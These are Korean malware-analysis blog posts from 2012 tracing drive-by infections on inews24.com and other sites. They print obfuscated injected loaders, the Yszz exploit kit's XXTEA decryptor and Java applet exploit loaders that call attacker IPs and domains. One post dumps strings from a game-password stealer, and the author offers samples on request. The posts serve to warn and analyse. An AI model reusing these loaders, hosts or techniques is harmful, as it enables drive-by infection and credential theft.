posted by Kwan's 2012. 9. 21. 22:45

이제는 지친다!!! inews24.com 에서 유포중이다!

주말마다 관리자는 무엇을 하고 있을까??



내부 소스에는 이와 같이 스페이스와 탭으로 이루어진 스크립트가 삽입되어 있다!


// Injected loader: the %xx string unescapes to <script src=http://205.164.5.190/pic/img.js></script>
// (the same host and path head the chain listed below), so the page pulls img.js on load.
document.write(unescape("%3Cscript%20src%3Dhttp%3A%2F%2F205%2E164%2E5%2E190%2Fpic%2Fimg%2Ejs%3E%3C%2Fscript%3E"));


--------------------------------------------------------------------------------------------


<script src=http://205.164.5.190/pic/img.js>

 ~>http://205.164.5.190/pic/img.html (Yszz 1.3 vip)

    ~>http://205.164.5.190/pic/swfobject.js
    ~>http://205.164.5.190/pic/jpg.js
 ~>http://205.164.5.190/pic/css.html (입!)

    ~> http://count24.51yes.com/click.aspx?id=249419322&logo=1


(Yszz 1.3 vip)


// Fragments of the XXTEA key, each a URL-escaped character run
// (MDIxo -> "xo", OIai8 -> "xo1", ERb7H -> "ox"); the elided lines hold the
// remaining fragments that XGpwn2 concatenates below before it is unescape'd.
var MDIxo="%78"+"%6F";
var OIai8="%78"+"%6F"+"%31";
생략
var ERb7H="%6F"+"%78";
var XGpwn2 =MDIxo+OIai8+HHYWv+CvXWz+JZyjl+ERb7H,AVgHbu2f=unescape,Cn6T4bG0znIi="aQCLHa58Cy3fSGI3MeP1sEO

KRLywbDXIIzBxULkgBn/D0nB/kT9MVqK/29rPw+7wspSSX4qYH3H4TMrS3lDaseKuZ+5ydruhSG6XAlVl81Fqy/9y5cz3aprjhQx6MLTaMoj9q650TsrPzkXNwh+Z77NWOlZvxX7bOFMlKO7BdlwwlwnujykUFSoyNi8snQ+N90mn7nOnAIzNndUPtUkLV/+B1YT9M1u+RRtR7fwCuD1F07IFFzf1aSbcqtdf2NMKG6xhSPeynlrxqj3uDGf41xlplDX8xIv0fepd4XsS+jZP0D0iy/B5RfpVqyMzuBPycllafgA9zCmrLhtJ0OmdlfXsc22xMemu1U6BxUyQMGxAokvOwqpdb+W9Sk2QCmcqsMewdHbk/Jfbqbee2cW9YtHv29tJaQo8WB7+7fZvONnukFDbr3ifuZTi6aT3gB4mHIazWfWZzKBTqhU2Nq

SqIM8cUmhw6TD+Wu/rlVT5SWujvvnaX9xYRSaNmOfrcrdRlS8838eJuA9RF

생략

+5f/QUEljDMY7HL0QPa0a087YViC/IbXMKTHlhaKoQM+IOuE5Gwz3GjltVa+yIvONfdD+c2uDwP4Q=",HUx2Ydz="%64"+"%6f"+"%63"+"%75"+"%6d"+"%65"+"%6e"+"%74",

sac5pxhFS="%77"+"%72"+"%69"+"%74"+"%65",ubo8KLEZHIPX2;
// Obfuscated property names, each passed through AVgHbu2f (= unescape, declared
// above): B83pNx -> "String", WjuQFO -> "fromCharCode", sATWUn -> "Array".
// So window[fxTmFiR][xZW9RVt] below is String.fromCharCode and
// new window[x83QqGV](...) is new Array(...).
var B83pNx = "%53"+"%74"+"%72"+"%69"+"%6e"+"%67";
var WjuQFO = "%66"+"%72"+"%6f"+"%6d"+"%43"+"%68"+"%61"+"%72"+"%43"+"%6f"+"%64"+"%65";
var fxTmFiR = AVgHbu2f(B83pNx);
var xZW9RVt = AVgHbu2f(WjuQFO);
var sATWUn = "%41"+"%72"+"%72"+"%61"+"%79";
var x83QqGV = AVgHbu2f(sATWUn);
function tzWmUni(str) {
    // UTF-8 -> string decoder (same shape as the widely copied Utf8.decode).
    // Bytes with a high nibble of 0-7 are copied as-is, 0xC0-0xDF start a
    // 2-byte sequence, 0xE0-0xEF a 3-byte one; any other lead byte is dropped.
    // window[fxTmFiR][xZW9RVt] resolves to String.fromCharCode (see the
    // unescape'd names above).
    var decoded = [];
    var total = str.length;
    var pos = 0;
    while (pos < total) {
        var lead = str.charCodeAt(pos++);
        var kind = lead >> 4;
        if (kind <= 7) {
            decoded.push(str.charAt(pos - 1));
        } else if (kind === 12 || kind === 13) {
            var second = str.charCodeAt(pos++);
            decoded.push(window[fxTmFiR][xZW9RVt](((lead & 0x1F) << 6) | (second & 0x3F)));
        } else if (kind === 14) {
            var second = str.charCodeAt(pos++);
            var third = str.charCodeAt(pos++);
            decoded.push(window[fxTmFiR][xZW9RVt](((lead & 0x0F) << 12) | ((second & 0x3F) << 6) | (third & 0x3F)));
        }
    }
    return decoded.join('');
}
var ZjykejU6Chars=new window[x83QqGV](-1,-1,-1,생략
7,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,4

7,48,49,50,51,-1,-1,-1,-1,-1);
// HUx2Ydz was declared above as "%64%6f%63%75%6d%65%6e%74"; unescape'd it is "document".
HUx2Ydz=AVgHbu2f(HUx2Ydz);
function ZjykejU6(str)
{
    // Base64 decoder driven by the ZjykejU6Chars lookup table (declared above,
    // -1 for bytes outside the alphabet). Four table values yield three output
    // characters; non-alphabet bytes are skipped, a '=' (code 61) in the third or
    // fourth position ends decoding, and so does running out of input on a -1.
    // window[fxTmFiR][xZW9RVt] resolves to String.fromCharCode. The original
    // carries a /*Yszz 1.3 vip*/ marker comment, the kit's version tag.
    var PAD = 61;
    var HIT_PAD = {};
    var limit = str.length;
    var pos = 0;
    var decoded = "";

    // Next alphabet value; -1 when the input ran out on a non-alphabet byte,
    // HIT_PAD when stopOnPad is set and the raw byte was '='.
    function nextValue(stopOnPad) {
        var value;
        do {
            value = str.charCodeAt(pos++) & 0xff;
            if (stopOnPad && value == PAD) {
                return HIT_PAD;
            }
            value = ZjykejU6Chars[value];
        } while (pos < limit && value == -1);
        return value;
    }

    function append(code) {
        decoded += window[fxTmFiR][xZW9RVt](code);
    }

    while (pos < limit) {
        var q1 = nextValue(false);
        if (q1 == -1) { break; }
        var q2 = nextValue(false);
        if (q2 == -1) { break; }
        append((q1 << 2) | ((q2 & 0x30) >> 4));
        var q3 = nextValue(true);
        if (q3 === HIT_PAD) { return decoded; }
        if (q3 == -1) { break; }
        append(((q2 & 0xF) << 4) | ((q3 & 0x3C) >> 2));
        var q4 = nextValue(true);
        if (q4 === HIT_PAD) { return decoded; }
        if (q4 == -1) { break; }
        append(((q3 & 0x03) << 6) | q4);
    }
    return decoded;
}
function long2str(v, w) {
    // Unpacks an array of 32-bit little-endian words back into a string, four
    // characters per word, rewriting v in place. When w is set the last word is
    // read (before the rewrite) as the original length and the result is cut to it.
    // window[fxTmFiR][xZW9RVt] resolves to String.fromCharCode.
    var count = v.length;
    var declaredLen = v[count - 1] & 0xffffffff;
    for (var idx = 0; idx < count; idx++) {
        var word = v[idx];
        v[idx] = window[fxTmFiR][xZW9RVt](word & 0xff, (word >>> 8) & 0xff, (word >>> 16) & 0xff, (word >>> 24) & 0xff);
    }
    var joined = v.join('');
    return w ? joined.substring(0, declaredLen) : joined;
}
function str2long(s, w) {
    // Packs a string into 32-bit little-endian words, four characters per word
    // (missing trailing characters read as NaN and contribute no bits). When w is
    // set the original length is appended as one extra word.
    var words = [];
    for (var offset = 0; offset < s.length; offset += 4) {
        words.push(s.charCodeAt(offset)
            | (s.charCodeAt(offset + 1) << 8)
            | (s.charCodeAt(offset + 2) << 16)
            | (s.charCodeAt(offset + 3) << 24));
    }
    if (w) {
        words.push(s.length);
    }
    return words;
}
// The XXTEA key: unescape of the "%xx" fragments concatenated into XGpwn2 above
// (kaixin below receives it as its second argument).
ubo8KLEZHIPX2=AVgHbu2f(XGpwn2);
// XXTEA (Corrected Block TEA) decryption of str with key Udkz: both are packed
// into 32-bit words by str2long and the plaintext is unpacked by long2str(v,true),
// which treats the final word as the byte length. delta 0x9E3779B9 and the mx
// mixing expression are the XXTEA constants and q = 6 + 52/(n+1) its round count.
// Precedence notes for the unparenthesised form: `a-b&m` is (a-b)&m,
// `sum>>>2&3` is (sum>>>2)&3, `k[p&3^e]` is k[(p&3)^e], and after the for loop
// p is 0, so the closing line uses k[e]. Empty input returns "" untouched.
function kaixin(str,Udkz){if(str==""){return"";}
var v=str2long(str,false);var k=str2long(Udkz,false);var n=v.length-1;var z=v[n-1],y=v[0],delta=0x9E3779B9;var mx,e,q=Math.floor(6+52/(n+1)),sum=q*delta&0xffffffff;while(sum!=0){e=sum>>>2&3;for(var p=n;p>0;p--){z=v[p-1];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[p]=v[p]-mx&0xffffffff;}
z=v[n];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[0]=v[0]-mx&0xffffffff;sum=sum-delta&0xffffffff;}
return long2str(v,true);}
// sac5pxhFS was declared as "%77%72%69%74%65" -> "write"; HUx2Ydz is already "document".
sac5pxhFS=AVgHbu2f(sac5pxhFS);
// JS0W is never declared with var, so this creates a global. Cn6T4bG0znIi is the
// long base64 blob declared above.
JS0W=Cn6T4bG0znIi;
// base64-decode -> XXTEA-decrypt with the unescape'd key -> UTF-8-decode.
JS0W=tzWmUni(kaixin(ZjykejU6(JS0W), ubo8KLEZHIPX2));
// window["document"]["write"](...): the decrypted markup (the applet/iframe code
// shown further down) is written straight into the page.
window[HUx2Ydz][sac5pxhFS] (JS0W);


-----------------------------------------------------------------------------------------------





중요한 부분!


// Fragment of the decrypted stage. kaixin is an applet element here (not the
// decrypt function above): it is pointed at an archive served under a .jpg name,
// given its entry class, handed the payload URL through a custom "dota" attribute
// and appended to the page.
kaixin.archive="K03rSYoG.jpg";
kaixin.code="GondadGondadExp.class";
kaixin.setAttribute("dota","http://209.73.158.76/css/img.css");
document.body.appendChild(kaixin);

OBJECT classid='clsid:8AD9C840-044E-11D1-B3E9-00805F499D93


document.write("<br>");
// A second <body> element is created and appended; the applet is still attached to document.body.
var kaixinq = document.createElement("body");
document.body.appendChild(kaixinq);
// Applet loader: archive served as tRMfS.jpg, entry class cve2012xxxx.Gondvv.class (as
// the author left it). The payload URL and the remaining strings are passed as custom
// attributes, presumably read back by the applet as its parameters.
var kaixiny = document.createElement("applet");
kaixiny.width = "256";
kaixiny.height = "256";
kaixiny.archive = "tRMfS.jpg";
kaixiny.code = "cve2012xxxx.Gondvv.class";
kaixiny.setAttribute("xiaomaolv", "http://209.73.158.76/css/img.css");
kaixiny.setAttribute("bn", "woyouyizhixiaomaolv");
kaixiny.setAttribute("si", "conglaiyebuqi");
kaixiny.setAttribute("bs", "748");
document.body.appendChild(kaixiny);


else {

var pcss=navigator.userAgent.toLowerCase();
var UaYcKzD2 = window.navigator.userAgent.toLowerCase();
if ((UaYcKzD2.indexOf('msie 8.0') > -1))
{

  document.writeln("<iframe src=LihTNR.html( Yszz 1.3 vip )><\/iframe>");

}

else if ((UaYcKzD2.indexOf('msie 6.0') > -1) || (UaYcKzD2.indexOf('msie 7.0') > -1))
{

  document.writeln("<iframe src=mO4b9.html( Yszz 1.3 vip )><\/iframe>");

}


연결지 정리 !


* 접속이 되어서 감염시 본인의 책임이라는 것을 알려 드립니다!


http://205.164.5.190/pic/img.js
~>http://205.164.5.190/pic/img.html (Yszz 1.3 vip)

        ~>  http://209.73.158.76/css/img.css (최종파일)

        ~>  tRMfS.jpg,  cve2012xxxx.Gondvv.class, mO4b9.html, LihTNR.html
    ~>http://205.164.5.190/pic/swfobject.js
    ~>http://205.164.5.190/pic/jpg.js
~>http://205.164.5.190/pic/css.html (취약점 미삽입!)
    ~>http://count24.51yes.com/click.aspx?id=249419322&logo=1


MD5 및 바이러스 토탈 결과 !


fd095a3357e85b4f4e5c27a9269ca021 css.html

https://www.virustotal.com/file/71254e55af538c134152bcbdd73a5c105990deb95fe5f83f34f1c27ad1db3518/analysis/1348234483/


bf1ca09bb8d9198d852a6b1ba68a355d Gondvv.class

https://www.virustotal.com/file/d15d49f0d7b4eb87ec89e7ac94bbc760e3e3000f89f46500d11ff5955f3ada17/analysis/1348234486/


acb18b560c15f972dbfbe7df5b5a8ae7 Gondzz.class

https://www.virustotal.com/file/9d44689791cb1d0c43be5fbbf6db660b826c5ac489a07a18d000780d0778fcb9/analysis/1348234489/


140c02cb07a6bf56a7b4a22020f03716 img.css

https://www.virustotal.com/file/de413e18f48bc2b461a2a7b2ae5680c104a89b71246ebcf734dc280fe6a218de/analysis/1348234508/


3c15a098eac02881b93014685a766674 img.html

https://www.virustotal.com/file/5a58dc316120d348d32e890146bfdd591d79e114e2dec6ef2f568fe923c89d93/analysis/1348234694/


6987108c7f85c4b6f097598433a3819f img.js

https://www.virustotal.com/file/06e0202eafcbc5aaf07f53be2c1e5004d84c61d62e17841d6252b4b5dbd13808/analysis/1348234699/


97c9b5b98c75bc4d20ccd6f8e28b0a7b jpg.js

https://www.virustotal.com/file/58c7d8245f33850b15212768e29489b6eded7ddbbfcda08e0d7d335c29df7a93/analysis/1348234724/


6c6799dd660ceda52cf31a46a34e3e3c LihTNR.html

https://www.virustotal.com/file/73206be591fd7db6b3342c7b091edc8f10865760e9d186870d64463c89f90484/analysis/1348234705/


5a38c126e782bc11206c7237967ad8f3 mO4b9.html

https://www.virustotal.com/file/db7c60c8f23ea1f7f0ec20726420d9eae9d2de4957704cdd23323dbd0930d243/analysis/1348234818/


de89a5739a7e333071160a552aa32b63 swfobject.js

https://www.virustotal.com/file/29ee593945dd3785157a2808e007505fb36113e3f025b4a581b0e8d333393caf/analysis/1348234827/


8990ccdbed763ef8aa3943b085313f88 tRMfS.zip

https://www.virustotal.com/file/12d81179803bd331f37383b3a2f6625af12c9fc4c2dde8d4a5dfac9df20e7a89/analysis/1348234883/


샘플 필요시 댓글 주세요!    아이뉴스 샘플.zip * 암호 설정중!


지난 아이뉴스 유포 글!


2012/09/01 - [security/악성코드 유포] - http://www.inews24.com 악성코드 유포중 !

2012/06/30 - [security/악성코드 유포] - 악성코드 유포중에 있는 inews24.com 악성 스크립트 정리 !

2012/06/29 - [security/악성코드 유포] - inews24.com 내에 공백을 이용한 악성 스크립트 살펴보기 !



posted by Kwan's 2012. 9. 17. 18:56

Agent.aye         V3LTray.exe         nsavsvc.npc         ws2_32.dll  WSCEnumProtocols    % w s   o v e r   % w s     W i n S o c k e t A . d l l     WSCWriteProviderOrder   WSCInstallProvider  WSCGetProviderPath  ole32.dll   CoCreateGuid    SHLWAPI.dll StrStrIW    WSCDeinstallProvider    SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\   LoadAppInit_DLLs    W i n S o c k e t A     %s.%s.tmp   \WindowsEx.dll  \WinSocketA.dll \lpk.dll    shlwapi.dll PathFileExistsA PromptOnSecureDesktop   EnableLUA   ConsentPromptBehaviorAdmin  SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System   RegCloseKey RegSetValueExA  RegOpenKeyA ADVAPI32.dll    %s\%s   \ws2helpxp.dll  \ws2help.dll    GetMessageA GetInputState   PostThreadMessageA  user32.dll


PASSWORD    World   USERNAME    \AionLog.ini    PM_shareReadWrite   var mystr =     b98tyu43213456789fucp569876 asd2g93kliportyt5uoanrbyvuc versionno=  firefoxpi=  strEncData= LoginID=    szPasswd    c   teencash.co.kr  userID= dk.halgame.com  &pwd=   game_id=13& aion.plaync.co.kr   pw  mabinogi.nexon.com  %*[^=]=%[^&]&%*[^=]=%[0-9a-zA-Z]    &password   accountName kr.battle.net   left    strLeftPw=  strLeftID=  right   no  &id=    dflogin=    info4=8 &sbanner=   nexon.com   %*[^=]=%[^&]&[0-9]  g_txtAuthNum=   gnxMapleOTPLoginAuthContainer   &strPassword=   &strEmail=  &keyname=   nxtURL= hangame.com %*[^=]=%[^&]&%*[^=]=%[^&]&  l_pwd=  l_id=   netmarble.net   l_domain=www.netmarble.net  %*[^=]=%[^&]&   usrid=  passwd= page_gameid=raycity page_gameid=fifaonline  page_gameid=www page_domain=pmang.com   pmang.com   this.AosGetText4 = function (elementObj){var e1=aos_get_text4(elementObj,1);var e2="";if(elementObj.value.length > 12){e2 = aos_get_text4(elementObj,2);}e2=aos_get_text2(elementObj);return [e1,e2];}/*------------------------------------------------------*/    this.AosGetText4 = function (elementObj)    function aos_get_text4(obj,order){var a="";try{a=MKD25.GetText4(obj,order);document.getElementById("sbanner").value=MKD25.GetText2(obj);return a;}catch(e){}return a;}/*------------*/  function aos_get_text4( obj, order )    NgbClientForm.AddChildForSubform( 'strLeftID', %s );

NgbClientForm.AddChildForSubform( 'strLeftPw', %s );


airyclient.exe LUOHAN  \LUOHANLog.ini  GetWindowTextA                                                                                                                                                                                                                                             ff2client.exe   FIFA    \FFLog.ini  InterlockedIncrement    kernel32.dll    iexplore.exe                                        dnf.exe                                             MapleStory.exe                                      lin.bin                                             ff2client.exe                                       heroes.exe                                          ExLauncher.exe                                      TERA.exe                                            OTP.exe                                             AION.bin                                            wow.exe                                             explorer.exe                                        raycity.exe         dkonline.exe        x2.exe              InphaseNXD.exe                                      AYAgent.aye                                         AYUpdSrv.aye                                        AYServiceNT.aye                                     AYRTSrv.aye                                         ALYac.aye                                           SystemMon.exe                                       SkyMon.exe                                          nsvmon.npc                                          nvc.npc                                             nvcagent.npc                                        Nsavsvc.npc                                         NaverAgent.exe                                      V3LTray.exe                                         V3LSvc.exe                                          V3Light.exe                                         SgSvc.exe                                           InjectWinSockServiceV3.exe                          aosrts.exe    
                                      aosbackv.exe                                        procscan                                            fairyclient.exe                                     aostray.exe                                         Diablo III.exe                                      

ws2helpxp.dll  WahCloseApcHelper   WahCloseHandleHelper    WahCloseNotificationHandleHelper    WahCloseSocketHandle    WahCloseThread  WahCompleteRequest  WahCreateHandleContextTable WahCreateNotificationHandle WahCreateSocketHandle   WahDestroyHandleContextTable    WahDisableNonIFSHandleSupport   WahEnableNonIFSHandleSupport    WahEnumerateHandleContexts  WahInsertHandleContext  WahNotifyAllProcesses   WahOpenApcHelper    WahOpenCurrentThread    WahOpenHandleHelper WahOpenNotificationHandleHelper WahQueueUserApc WahReferenceContextByHandle WahRemoveHandleContext  WahWaitForNotification  cationHandleHelper  c : \ W i n d o w s \ c o m     WSPStartup  ws2help.dll alyac   sgrun.exe   


전형적인 게임 탈취 목적의 악성코드로 보인다!

특히 ws2helpxp.dll로 바꿔치기하는 전형적인 방법이 아직도 쓰이는걸 보니...

아직도 꽤 많은 이용자가 이 방법을 통해 유출이 되는거 같다! 게임탈취뿐 아니라 OTP에 백신까지도

정말 생각을 많이 하는거 같다!


이제는 사후가아닌 사전에 막는것이 되어서 사용자가 이런일이 없도록 방지하는 방법이 정착이 되었으면 한다!


PS. 올만에 실행시켰더니 ㅠㅠㅠㅠㅠ 버벅버벅 힘들다 ㅠㅠㅠㅠ



posted by Kwan's 2012. 9. 1. 16:30

* 현재 감염된 사이트 입니다. 접속시에 감염이 될 수 있으니 유의하시기 바랍니다!


근원지 : http://www.inews24.com 내 스크립트 !


1차 연결 : http://69.46.86.221/pic/img.js


2차 아이프레임 : http://69.46.86.221/pic/img.js

~> http://69.46.86.221/pic/img.html (404 Not Found)

~> http://69.46.86.221/pic/css.html (익스플로잇 미삽입)


[inews24 내 스크립트]


// Author's decoding variant of the whitespace-encoded loader found in the inews24
// page (the unmodified original appears later on this page with String.fromCharCode):
// each byte is built from 7 characters, a space contributing a 1 bit and anything
// else a 0; String.fromCharCode was swapped for alert so every code is displayed
// instead of executed. The surrounding cookie logic runs the decoded text through
// Function()() only while one of the two cookies is absent, then sets the missing
// one for 24 hours.
function RDfADFLDEXDFu5(s) {var r = new Array();var curr = 0;while(s.charAt(curr) != '\n') {var tmp = 0;for (var i=6; i>=0 ; i-- ){if (s.charAt(curr) == ' '){tmp = tmp | (Math.pow(2,i));}curr++;}r.push(alert(tmp));}return r.join('');}if(document.cookie.indexOf("ERTDSDFF")==-1 || document.cookie.indexOf("WERXRF2")==-1)Function(RDfADFLDEXDFu5(" [중략]\n"))();var cookiename = document.cookie.indexOf("ERTDSDFF") == -1 ? "ERTDSDFF" : "WERXRF2";var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie=cookiename+"=Yes;path=/;expires="+expires.toGMTString();

-----------------------------------------------------------------------------------------------


[디코딩]


100,111,99,117,109,101,110,116,46,119,114,105,116,[생략],34,41,41,59


~>document.write(unescape("%3Cscript%20sr[생략t]%3E"));

~> <script src=http://69.46.86.221/pic/img.js></script> 연결 !


[img.js 스크립트]


// img.js stage: one-shot gate keyed on the AdVvKHCY cookie; user agents containing
// "bot", "spider" or "linux" are skipped. The UA was lowercased, so the
// indexOf("Safari") test (capital S) can never match and Safari is not excluded.
var DkilOy=navigator.userAgent.toLowerCase();

if(document.cookie.indexOf("AdVvKHCY")==-1 && DkilOy.indexOf("bot")==-1 && DkilOy.indexOf("spider")==-1 && DkilOy.indexOf("linux")==-1&& DkilOy.indexOf("Safari")==-1)

{

// Cookie valid for 24 hours, so each visitor is served once per day.
var expires=new Date();

expires.setTime(expires.getTime()+24*60*60*1000);

document.cookie="AdVvKHCY=Yes;path=/;expires="+expires.toGMTString();

// Two 116x1 borderless iframes pull the next-stage pages.
document.write("<iframe width=\"116\" height=\"1\" frameborder=\"0\" src=\"http://69.46.86.221/pic/img.html\"></iframe>");

document.write("<iframe width=\"116\" height=\"1\" frameborder=\"0\" src=\"http://69.46.86.221/pic/css.html\"></iframe>");

}


-----------------------------------------------------------------------------------------------


http://69.46.86.221/pic/img.html


=========================

Server IP(s):

0.0.0.0

=========================

HTTP headers: 

HTTP/1.1 404 Not Found


http://69.46.86.221/pic/css.html ~> 익스플로잇 미삽입!




posted by Kwan's 2012. 8. 25. 19:57


메인 스크립트 !


<!-- Packed redirector. The two try/catch layers are anti-analysis: ""+n reads n before
     it is assigned and eval("a=prototype") reads an undeclared name, so both throw in a
     real browser and execution lands in the inner catch. There the dotted digit string is
     split, entry i is divided by (i%4)+4 (h is -016/7 = -2, so h*h is 4; the loop runs
     i = 0..160) and turned into a character, and the result is passed to window.eval.
     Decoded, it is the hidden 2x2 iframe shown below. -->
<script>s="";h=-016/7;try{q=document.createElement("p");a=(q)?"appendC":12;q[a+"hild"](""+n);}catch(qw){f=(q)?"fromCharCode":2;try{eval("a=prototype");}catch(zxc){e=window["eva"+"l"];n="52.50.[생략].91.40".split(".");if(window.document)for(i=6-2-1-2-1;-161+i<0;i=1+i){k=i;s=s+String[f](n[k]/(i%(h*h)+4));}e(s);}}</script>


----------------------------------------------------------------------------------------------


디코딩을 위한 변형 ! 


<script>

// Author's decoding variant of the script above: the accumulation s=s+... was replaced by
// alert(document.write(...)), so each decoded character is written to the page (and an
// alert raised) instead of being collected and handed to eval.
s="";h=-016/7;try{q=document.createElement("p");a=(q)?"appendC":12;q[a+"hild"](""+n);}catch(qw){f=(q)?"fromCharCode":2;try{eval("a=prototype");}catch(zxc){e=window["eva"+"l"];n="52.50.600.[생략]1.40".split(".");if(window.document)for(i=6-2-1-2-1;-161+i<0;i=1+i){k=i;s=alert(document.write(String[f](n[k]/(i%(h*h)+4))));}e(s);}}

</script>


디코딩 후 !


<iframe src="http://evdyvaz.ru/count17.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>


현재 서버는 죽어있는 상태입니다!


=========================

Server IP(s):

0.0.0.0

=========================




posted by Kwan's 2012. 8. 11. 11:09


[악성 스크립트]


 function c102916999516m4943389011261(m4943389011648)

 {

   function m4943389011a31()

   {

     var m4943389011e19=16;

     return m4943389011e19;

   }

   return (parseInt(m4943389011648,m4943389011a31()));

 }

 function m49433890125ea(m49433890129d2)

 {

   var m4943389013589=2;

   var m4943389012dba='';

   m4943389014143=String.fromCharCode;

   for(m49433890131a2=0;m49433890131a2<m49433890129d2.length;m49433890131a2+=m4943389013589)

   {

     m4943389012dba+=(m4943389014143(c102916999516m4943389011261(m49433890129d2.substr(m49433890131a2,m4943389013589))));

   }

   return m4943389012dba;

 }

 // z89 is an empty string spliced between the hex fragments, presumably to break
 // simple signature matching. The hex (elided by the author) starts "3C736372..."
 // = "<script>if(!m" and decodes through m49433890125ea to the script shown in the
 // [디코딩] section below, which is written straight into the page.
 var z89='';

 var m4943389014917='3C7'+z89+'3637'+z89+'2697'+z89+'07'+z89+'43E696628216D7'+z89+'96961297'+z8[중략]';

document.write(m49433890125ea(m4943389014917))


[디코딩]


---------------------------

웹 페이지의 메시지

---------------------------

<script>if(!myia){document.write(unescape( '%3c%69%66%72%61[중략]%65%3e'));}var myia=true;</script>

---------------------------

확인   

---------------------------


[HEX 디코딩]


<script>if(!myia){document.write(unescape( '<iframe name=c10 src='hXXp://gogo2me.net/.go/check.html?'+Math.round(Math.random()*441780)+'53ebedca2' width=796 height=555 style='display: none'></iframe>'));}var myia=true;</script>


[링크 정리]


최초 페이지 : hxxp://insaweb9.cafe24.com/bbs/login.php?id=best

iframe 연결 : hxxp://gogo2me.net/.go/check.html?

frame 연결 : hxxp://ww1.gogo2me.net

최종 연결 : hxxp://dsparking.com/?epl=BuMcp4amXBdAWsCMnIJ0Z4C2x48RJBROkdzFv8QqzkJ4Ay1CXlxfQ6mi61vN0pPAoOmoXXBgdmlh6Kicts9kZcc0IhH9Vq6Gtobv5oNuGaFAFOK6wEvwlRCIYioJpGfY9zPLjIhnGiFIJ2eWQ8ruVVzYpcOFgqBaZ5r975LUC4SpplPK4OQBu9zgFyDHBgMK6glEw1kwqCot4FuQc67dqY1xmsphQpFN5T73rcKLa0f5wXH3m1H-yQ4BxYYmEkVIc9ocXX2MFxjYFlmSTLGs7d863edJt4Xr6E7PcBlwb6z67kPP1cfgtBAuo-KlChGDjZMx9m2rLj97RSSSkjTj43wKfbaH8Uq-DD3UrmIZKAjSGDqjUueK1pbNkCdH-B2oSs5TQl45ngI8oFxUs-WJXFoTnCn8MPuS4TAaUI8GqAcyDQDUo5Ge9FBPmZ7aFE9FAIB6IKMB6dGoJz31QKb6SU95oMmUpyKUUT-lR6ZN9YNGeoIpHo1qTzUNPfVTI9J7qpn0VNEsLQEw8P__v_D__7_y_wMAAECAXw8AANoeP0ZZUyZZQTE2aFpClAEAAPA


hxxp://ww1.gogo2me.net?epl=Up_MRQiLp0w607k_C8ICdwDLC8kfEgqnSO7iRrI_BtcJeODFzQ-jZnaN67qWUo1O8zsWeCBxWS_adJTTtpsoiD55i0SVyKgwITinR5GwBulQgTiGXwppNtIRtmLj3tJv_BrvV0IQN0L51Aoyhr_9YAK-E115DY09ZgVSM6499eXEPnyiMn7DYN0SZ9c8WImC3STQbi3pe1VjdwCL8Uo6CvfV6xFjJk0-ETP50EiGwQKsRgWbySVlcjpwttDVpv7seO49LtPh9oBcg3M9ihhVJTVe3XBLfe9ShwhI4V4UxTHu-Z_kOUxbmI2ytetLI1t-o412qJYgmGFxsZ1TBHKDd4fAIGQxWQxYbXBhxtJ1uU07PxomPJgwqWydab3L8vO8AxC-sCxlMmKaaUoPU5t6apjQJrUR06b01KaYplH_VAU01KapBzSNpiGASU8w0UzANE2mIgaaJhMAAKYJEyYAE2DCHBMWATDw__-_8P__v_L_AwAAQIDfDAAAWF5I_llTJllBMTZoWkJqAQAA8A


최종 연결지는 현재 접속이 안되고 있습니다 !

=========================
Server IP(s):
0.0.0.0
=========================



posted by Kwan's 2012. 6. 30. 10:07

최초 감염 페이지 : http://inews24.cox/js_lib/slide_new.js

                          http://lzxvx.com/pix/rot.html

                          http://lzxvx.com/pix/ll.html

                                ~>최종 파일 : http://oppo.ltevc.com/csx/8191i.css

                                ~> <iframe src=nBQVd.html>

                                ~> 최종파일 : http://oppo.ltevc.com/csx/8191i.css

                                ~> <iframe src=utEWY.html>

                                 ~> 최종파일 : http://oppo.ltevc.com/csx/8191i.css

                            http://lzxvx.com/pix/swfobject.js

                            http://lzxvx.com/pix/jpg.js



var Yszz1="%59"+"%73"+"%7A"+"%7A"+"%30"+"%30";var Yszz2="%78"+"%78"+"%6F"+"%6F"+"%78"+"%78";var Yszz3="%30"+"%30";var pkucde =Yszz1+Yszz2+Yszz3,AVgHbu2f=unescape,cu1l2lp3s2z="WdQOuGkE6OzRFoogdm06G5/

ZwORxIFg6MUdLmoM5TsOjunE3gpAu2UamKTbHI579p8YjKzukIY0iiGPnAzuoELwFCBvivDq

Vsp0xEJqsYhv4fmgbTn+l6gS/ZSmfWq7bYYj75F4qDqKDCzsDYf4SUhxtoWikabVa5kxYA61CR

qLyfN4lvEaSErH/pSIFZzVo8h0GQicb2PyxrigX6tUz4e8idBmR9NmHu997aWdIhxnSIhFG7+M+C

WV38iEKKUoOpWsHLNYR408rdFKuBRLVB9mqfzoO/A9Ov5p6WH2GKnXUhZ8p1lKnIAhbrZLrzI

+b5dk84M2M1S118FCy0GHhhq6MDnc3Q2yxcvukLdHaW3kkmd2u+1ZWAvZ0IpXSPAmI6vrv4dy

eq88RSCzeWTubmBD9MFlnEisRNIp/FuGWxDo9EbnmXp6uClXdRfwTgU5iraHQKcZU0ax43fE

Z4FRRdGAk1N66BNBGy8h6iYdsTcOBIJEKWpRWGuwc/4d9CRMnb9p8FOSFgQB+cet/8v4Z6

Eqd9lg9ARlEPRfn/XDfp+QbkH3R3A8JTUZlZ5h4p/qC4WLVHr2AmrA2S3/L4A07CmltBEBCmq

+Spg2Y9yRMZBYr3ZHxryCvJ3aI5CXm79TrJnrf+spRlidyzGSHFPTceqTqnozmJWRhn0sBT3eh

/PM/5cu0EH5gyUCeeJAstulZwOXCA9zrtHmB1KKP//LWZhHZHZx4LSR9swW/U4xCghmBiQO

//qbbXPD+PAkKnb/5j5qT5EjtrD/z+[중략]

/wBrtEEWSiNuj1SdT3xzOTTaM2Di0TPIiXdZ0BPFlDaSYWgxYFVmntCd1D8A9idlpJcQfWH1YK30ve

YjWcwRpgGapbfUUYx0KOdPU/5+Di4brvdJSlwemIjIe2kphz/91BznRNjmkjLLwtrxcJzmDT1NZSQtb

